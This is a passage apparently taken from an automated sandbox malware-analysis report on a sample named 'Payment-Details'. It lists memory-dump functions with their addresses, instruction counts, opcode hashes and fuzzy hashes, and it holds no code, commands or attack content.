                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 974335c0d51b13cc9fad5be45c5ac62786ec4f9f6a46a167da32a8be9204b81d
                                        • Instruction ID: d8ad4e0ab9479cd2409a498e57bd1e579518265a3c53ed2c66b247865498cb86
                                        • Opcode Fuzzy Hash: 974335c0d51b13cc9fad5be45c5ac62786ec4f9f6a46a167da32a8be9204b81d
                                        • Instruction Fuzzy Hash: 97F028713003019FC711DB29D8C58EABFB6EFC52207054166F948CB222DB709C49C791
                                        Function 0725B998 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: befaad6eecd12ecfb7af9f6990b0b1670a0b245eadf21cc8e4fa2edb762fdef5
                                        • Instruction ID: 5ed0c67afcb066d85de8e28b32086026fc4c32c174e054a7a18f5fef7f928b2b
                                        • Opcode Fuzzy Hash: befaad6eecd12ecfb7af9f6990b0b1670a0b245eadf21cc8e4fa2edb762fdef5
                                        • Instruction Fuzzy Hash: 91F06D713104119FC7049A1ED994A2AF7EAFBC8650B1480B9EA09CB366CE72EC01CBD0
                                        Function 070E26D8 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dae49a649c378726e8d0e6a56c43fcf35c5abe9ce97fd236446bc95292ae939f
                                        • Instruction ID: dee36683bc83eb2f019a75a29f527e690617ce78ab98b17b92b6c78b0e95f2db
                                        • Opcode Fuzzy Hash: dae49a649c378726e8d0e6a56c43fcf35c5abe9ce97fd236446bc95292ae939f
                                        • Instruction Fuzzy Hash: D2F0AFB480A20CEFC711DFA4D8019DABBB8EB46204F1046EAD844A3211EA319E0587D1
                                        Function 07256F38 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4904a9a493ea3b4ad178f1e02942716001ad4aba6764d791d640f0fcb94275ee
                                        • Instruction ID: 6e69aee473a987a222811314b9042398dfe8e60949474b0833da5e8058bfcb88
                                        • Opcode Fuzzy Hash: 4904a9a493ea3b4ad178f1e02942716001ad4aba6764d791d640f0fcb94275ee
                                        • Instruction Fuzzy Hash: 03110AB89012188FDB94EF64D849BADFBB2FB49300F5042A9D90AA7394CB345E85CF51
                                        Function 07256708 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41eec00827d638b340e60f82cb04cfbf15a2c347ee87349a92915607701437b1
                                        • Instruction ID: e11886c3f57fbc0dd3b3173a5ffd45630519cff184cd4b4c209c441878b5a1c7
                                        • Opcode Fuzzy Hash: 41eec00827d638b340e60f82cb04cfbf15a2c347ee87349a92915607701437b1
                                        • Instruction Fuzzy Hash: EBF0C2B0A69308EFCB10DFA8D844BAD7BB8EF06201F5042D9E80963321D7749E80CB55
                                        Function 070EF4A0 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66398c7d7d143154e7a5287a55da69968c8bbde951462569664baa7a12c11288
                                        • Instruction ID: d59ded4a75e61c17fb743b44fa7ea7435a6b478b0f549a25b1cc4a4a1c4be506
                                        • Opcode Fuzzy Hash: 66398c7d7d143154e7a5287a55da69968c8bbde951462569664baa7a12c11288
                                        • Instruction Fuzzy Hash: 1CF04632700109ABDB249A29C854AAAFBEDDFC5320F048066ED55C7361CF30A802C791
                                        Function 075109AA Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c29d2826eee96edb7782f48ae38ca1477b8c49ee466fd82b9037a770db3e041f
                                        • Instruction ID: 89110a529ad0f71f43e222ffe8d7a0a4168ec491267c4796238ed08900f157af
                                        • Opcode Fuzzy Hash: c29d2826eee96edb7782f48ae38ca1477b8c49ee466fd82b9037a770db3e041f
                                        • Instruction Fuzzy Hash: 9C11B3B4901129CFDB68DF54D845BE9B7F5FB49300F5480E9D94DA3280DB345E818F91
                                        Function 066F10CD Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 499ea0b0eefa82b60c921aed07ea91d327af22c19052eb0ee602e729e27bbb15
                                        • Instruction ID: e0bce936c96b3985ef8c8836d4e068746317b0e8ff5e681b5fda76404c3fddbb
                                        • Opcode Fuzzy Hash: 499ea0b0eefa82b60c921aed07ea91d327af22c19052eb0ee602e729e27bbb15
                                        • Instruction Fuzzy Hash: D4119D74D00668DFDBA4DF69DC94B98B7B2BB88301F5081E9D60EA7250DB315E858F40
                                        Function 075166C3 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0248dcf04d6bde9985e013e9f95827da04b57bef0c8388afc7b366610f7da8f7
                                        • Instruction ID: be004c456faaff62321fc470b64ed96e007f7555d1a4b0bfc3a85e0376cce9b3
                                        • Opcode Fuzzy Hash: 0248dcf04d6bde9985e013e9f95827da04b57bef0c8388afc7b366610f7da8f7
                                        • Instruction Fuzzy Hash: 1D11BFB4A00169CFDB64DF64D959BECB7B5BB49301F4040EAD94DA3280DBB46EC49F21
                                        Function 0723C5BA Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8978fe1a5f3bbc75d2606fac17a36314fde404c461aaa4983a5ded43fceab61f
                                        • Instruction ID: c92cfc114e2acb16e98a826a83f8ac86736cd2d711b12327c5458efdedd990cc
                                        • Opcode Fuzzy Hash: 8978fe1a5f3bbc75d2606fac17a36314fde404c461aaa4983a5ded43fceab61f
                                        • Instruction Fuzzy Hash: 0B111EB0A10218CFDB54CF28D996BA9B3F1FB4D300F605199DA0A97356DB359E85CF81
                                        Function 0723C412 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bbf1ac79f25273a038e946c7514395c509219da211a7acce65fe827f3e2a098
                                        • Instruction ID: 1625deb79206c55076a7dd30ee7fd925f6b2582f5673c64de555f1df6c22c059
                                        • Opcode Fuzzy Hash: 0bbf1ac79f25273a038e946c7514395c509219da211a7acce65fe827f3e2a098
                                        • Instruction Fuzzy Hash: EE1169B0A10204CFDB54CF69D496BADB7F6FB48300F209269D8099B356CB359C40CF81
                                        Function 072314B0 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8937908f557cb083c7a275b1ee31fbdde81cac4e837f6ef66034b04682b4fb85
                                        • Instruction ID: c4901691674c7feb754a96d4deb7782f877390399af04965a2e81790e6b81af6
                                        • Opcode Fuzzy Hash: 8937908f557cb083c7a275b1ee31fbdde81cac4e837f6ef66034b04682b4fb85
                                        • Instruction Fuzzy Hash: AF016935300611DFC7099B24D018D1EB7A6EFC8B11B108229EA068B7A0CF3AED02CBD5
                                        Function 07259BF8 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 030b4546e05113d7e957d246502f6a49ac9c371c25515c5848b8b4be48b7c3a9
                                        • Instruction ID: e139b1bb70cd49563cf6e2478d02044c61716a590ef454602958a6a94ca52192
                                        • Opcode Fuzzy Hash: 030b4546e05113d7e957d246502f6a49ac9c371c25515c5848b8b4be48b7c3a9
                                        • Instruction Fuzzy Hash: E4F02BF2B1D392DFF312832458107256B919BC6505F0844DBD4C18F2D2D6A6E843C351
                                        Function 0723C8AC Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: de23f5ab0ac1034205e90b418a9552a0c66cc886a5efeda28475bad278acb7f7
                                        • Instruction ID: 453c4b12ff6c42e25fb00d2ff9d31d3ef6386a707a5b0360287910b42ff27a6a
                                        • Opcode Fuzzy Hash: de23f5ab0ac1034205e90b418a9552a0c66cc886a5efeda28475bad278acb7f7
                                        • Instruction Fuzzy Hash: 7611C9B0A10254CFDB54CF18D896BA9B7F5FB49300F1091A9DA0A9B255DB789E80CF91
                                        Function 07259BA0 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e26528c4812931215f38f7e92ccca0e8597378939822533e437f4257707fa96
                                        • Instruction ID: 2865d5e1af8dcc0d36bf9c7ecf15a88018e91f768770c53b620abfdfd722b26b
                                        • Opcode Fuzzy Hash: 1e26528c4812931215f38f7e92ccca0e8597378939822533e437f4257707fa96
                                        • Instruction Fuzzy Hash: 7DF0E971B042129FF714C6199814B2BF7A9EBC9710F14846AE9459B380CBB6FC81C3D0
                                        Function 070E7921 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a84d702084462a076ef434f03cd20554c55c0870124c97cdf232688f953e2d09
                                        • Instruction ID: 25d02b4e48db65ab560fff331dbc18045b69f2dc9b7934500ee419e455c2bb7e
                                        • Opcode Fuzzy Hash: a84d702084462a076ef434f03cd20554c55c0870124c97cdf232688f953e2d09
                                        • Instruction Fuzzy Hash: 8CF0C270809248AFC781CFA8D850BEDBFF9AB49210F14C19AE868D3251D6348B52DB60
                                        Function 070E287D Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89c828165cb6f13065a37bb761be4777472257a9dd528a3d2fba53cdd065a730
                                        • Instruction ID: 31c099168d4ac8b16d7b4faed75660497015d15888a0b4f3801256a35818f3f7
                                        • Opcode Fuzzy Hash: 89c828165cb6f13065a37bb761be4777472257a9dd528a3d2fba53cdd065a730
                                        • Instruction Fuzzy Hash: 9A0144B091462ACFDB20CFA8E884BACBBBCFB09304F104269D45AA7240E7344886CF41
                                        Function 066F1D78 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ff7378ecae9ff353a95aeac4c7499daea9d08a85c4559b77d134618e68d82c9
                                        • Instruction ID: dc6cd09abfb6755435142148cb928dc316477e5504625b79ee110431009f1b97
                                        • Opcode Fuzzy Hash: 6ff7378ecae9ff353a95aeac4c7499daea9d08a85c4559b77d134618e68d82c9
                                        • Instruction Fuzzy Hash: 11014B72C0420AEBCF11DF94CC019EAFB75FF89314F108509EA5827251D772A5A2CBA1
                                        Function 0723FB59 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb47a67f1ce37c54b578c2a952a19cffa6e7a215af1502704b773ee2ad7b5d22
                                        • Instruction ID: 345d26ed79f872dcd1167313775be5ad7e21433f8e40f4a80c7d372246d99be1
                                        • Opcode Fuzzy Hash: bb47a67f1ce37c54b578c2a952a19cffa6e7a215af1502704b773ee2ad7b5d22
                                        • Instruction Fuzzy Hash: 0E01ADB1C0074AABCB10DFA5D8409D9FBB5FF9D320F10C61AD45473210DB31AA95CBA0
                                        Function 07239C60 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05bf9b3550e126d7ea922d9f15782cad4b18954bc17b4f8195fc9b0763485d00
                                        • Instruction ID: ba28c7e9a5c5e8b37eca095f97cb04c4976e920a32141c099469be22c72b6f79
                                        • Opcode Fuzzy Hash: 05bf9b3550e126d7ea922d9f15782cad4b18954bc17b4f8195fc9b0763485d00
                                        • Instruction Fuzzy Hash: 0BF024B0419248EFCB12DBF4D80065EBBF4DF4B208F0009DAD84997251DE32AD41DB92
                                        Function 0725A759 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75b8f941bbcc9cedebe96a55ea1c346b54be9948ac58098fbe4a3860061cf593
                                        • Instruction ID: 30920afcaafbf0e39eaf2ecbc9f7fd2d0d78fd686a7ef8054d2d3a3f9e2e5e4b
                                        • Opcode Fuzzy Hash: 75b8f941bbcc9cedebe96a55ea1c346b54be9948ac58098fbe4a3860061cf593
                                        • Instruction Fuzzy Hash: 71F030753143929FC7068F69D894C9A7FF9AF9A61131581AAF946C7262CA31CC15CB20
                                        Function 07231232 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c663169f6bd810a849bab5c2632f052ce832e3c37b10b207432b53e0f56a814
                                        • Instruction ID: 521fcc9be3dda8c15904ba390e33f4aa8169c112af02d514cf7a00b87debd983
                                        • Opcode Fuzzy Hash: 3c663169f6bd810a849bab5c2632f052ce832e3c37b10b207432b53e0f56a814
                                        • Instruction Fuzzy Hash: 76F049753002019FC3149F19D454D2AB7AAEFC9721B21816AE986CB360CB35EC02CB40
                                        Function 0723C5A1 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ceb371ec5abb9ed12ce7fb28247b1c35af1761c4751b83f8fd59e0a51c6b4db7
                                        • Instruction ID: feb38b40d130fd721dd95fec1039256e49b866cb6a1867422e4ea6441af65539
                                        • Opcode Fuzzy Hash: ceb371ec5abb9ed12ce7fb28247b1c35af1761c4751b83f8fd59e0a51c6b4db7
                                        • Instruction Fuzzy Hash: 721144B0A20218CFDB10CF28D886BA8B7B1FB0A305F1081D9D909AB246C7399E85CF45
                                        Function 072393D0 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56f06150eb754c1ce41eec54204c8bdc7f5046ff2546068a11aa22c870d9045b
                                        • Instruction ID: 9c5b74d2fa1dcfebdb1dceea5dd3a91193e7833e0292876e91588728c69974c7
                                        • Opcode Fuzzy Hash: 56f06150eb754c1ce41eec54204c8bdc7f5046ff2546068a11aa22c870d9045b
                                        • Instruction Fuzzy Hash: 3FF0B4F1816348EFCB90DFB4D84029D7BB4EF07205F2000E9C88893161E6345A84D741
                                        Function 07231202 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e350cb1b82362b07117f9665983459518f369a4007b9652a8a7b3c40f15f3a1
                                        • Instruction ID: 11735c6397f0d2a729fe5e547d72805a98b0f1d219ab8238cbc4b0f40bb46086
                                        • Opcode Fuzzy Hash: 1e350cb1b82362b07117f9665983459518f369a4007b9652a8a7b3c40f15f3a1
                                        • Instruction Fuzzy Hash: 69F0977A114144EFCB029F95D844C95BF76FF1A36171A80D2E6844B232C332D965EB51
                                        Function 070E9EE0 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db9efd0019ee801d418e9926eab87f37e1fc31c1c813836c12e082ae0c647a4e
                                        • Instruction ID: 8468e106b44ab3357cfa689d6dfea41d29a9d9b8e2fb974d059a3a1ff10a6dad
                                        • Opcode Fuzzy Hash: db9efd0019ee801d418e9926eab87f37e1fc31c1c813836c12e082ae0c647a4e
                                        • Instruction Fuzzy Hash: 5EF090B4D04348BFCB40DFB4D4196ADBBF8EF06200F1081EAD898E7252D7345A86CB62
                                        Function 066F0709 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f017a573fcc8368c8c04927aa658d240a3634e716beae19268c2a5cab018492
                                        • Instruction ID: 0e0ab5464be0d84b4b22c6e49503f9fe8663dc66ab9dc3f3161949275b917c0c
                                        • Opcode Fuzzy Hash: 0f017a573fcc8368c8c04927aa658d240a3634e716beae19268c2a5cab018492
                                        • Instruction Fuzzy Hash: 91F08234449308BFCF01CFA0DC519EA7FB9EB0A304F148189FD4467262C731AA62EBA1
                                        Function 07258C10 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2eb6eb46af552eb35d2d203ddb17c8dae75cd471400dbc652345518d1b722ae8
                                        • Instruction ID: 2c0115941790646af56f9627eabdb748166588663f76225ad335234dd3bd0055
                                        • Opcode Fuzzy Hash: 2eb6eb46af552eb35d2d203ddb17c8dae75cd471400dbc652345518d1b722ae8
                                        • Instruction Fuzzy Hash: A7F0BE70D09388AFCB45CBA8D8512ECBFF0EB4A200F1490DAC89893211DB305A42CB41
                                        Function 070E7599 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d763fcd4b3eb976bd417c4a85bed0739ee3a673e9157e3d5a3e1b0c0ad7ed57f
                                        • Instruction ID: 79a41fa453352a84171dbb615bc3015b0c0228c9895dd22667fa47cf1b0c3652
                                        • Opcode Fuzzy Hash: d763fcd4b3eb976bd417c4a85bed0739ee3a673e9157e3d5a3e1b0c0ad7ed57f
                                        • Instruction Fuzzy Hash: A5F058B1D0A348EFCB42DFB498006DDBFF5EB0A200F1081EAD85496221D7359A85DB91
                                        Function 070E449D Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: da9f0e68c027805401607954d02bf7fb4c8429d8413a37dabafca86db1d3edf9
                                        • Instruction ID: 0dbd3bd2b9c4cd9a42b59eb38999aad17f8835420d1158220e22fa5a4bdb5ef1
                                        • Opcode Fuzzy Hash: da9f0e68c027805401607954d02bf7fb4c8429d8413a37dabafca86db1d3edf9
                                        • Instruction Fuzzy Hash: 570119B0A05258CFDB64DB66CC44BE9B6B9BB4A300F0091E4A44AA7254DA345E84CF20
                                        Function 066F1D88 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4fe64e78aeb609674f2c125a0bda5c3297a4d6ce21469db927be1e7b2f966b87
                                        • Instruction ID: f6667b1dfc480dd10c5333e0c5495209f14bda953f2a77d90966ee926ca5c8aa
                                        • Opcode Fuzzy Hash: 4fe64e78aeb609674f2c125a0bda5c3297a4d6ce21469db927be1e7b2f966b87
                                        • Instruction Fuzzy Hash: 1EF0C431C0021AEBCF41DF99D8009EEBB75FF8A320F14C519EA5827211D732A5A6DB90
                                        Function 019F0F62 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60e8311e697b4099a39981681c145032abc60c7e02bf3fc7f4199cfac0977627
                                        • Instruction ID: 94839bcd23f83d9d189f159a8a827e22660ede8ed2ea5a803ae4226108ce9090
                                        • Opcode Fuzzy Hash: 60e8311e697b4099a39981681c145032abc60c7e02bf3fc7f4199cfac0977627
                                        • Instruction Fuzzy Hash: A6F0AF70C08349DFD710DFA8840556EFFF9EB04211F14849AD649E7246E2348945CB91
                                        Function 0723CF30 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0089ca67b6ad1dbeba2376ddcf1a109e3be0d914f404205f69fc4e452cd763b1
                                        • Instruction ID: 30a779348864f9a755fea893d98958850740cc66359f4b2d7ad44d528450052b
                                        • Opcode Fuzzy Hash: 0089ca67b6ad1dbeba2376ddcf1a109e3be0d914f404205f69fc4e452cd763b1
                                        • Instruction Fuzzy Hash: 5DF0BBB1809348FFCB85DFA4D810AADBFF4EF0A300F0480D6F95497251C6319A51DB61
                                        Function 07231238 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
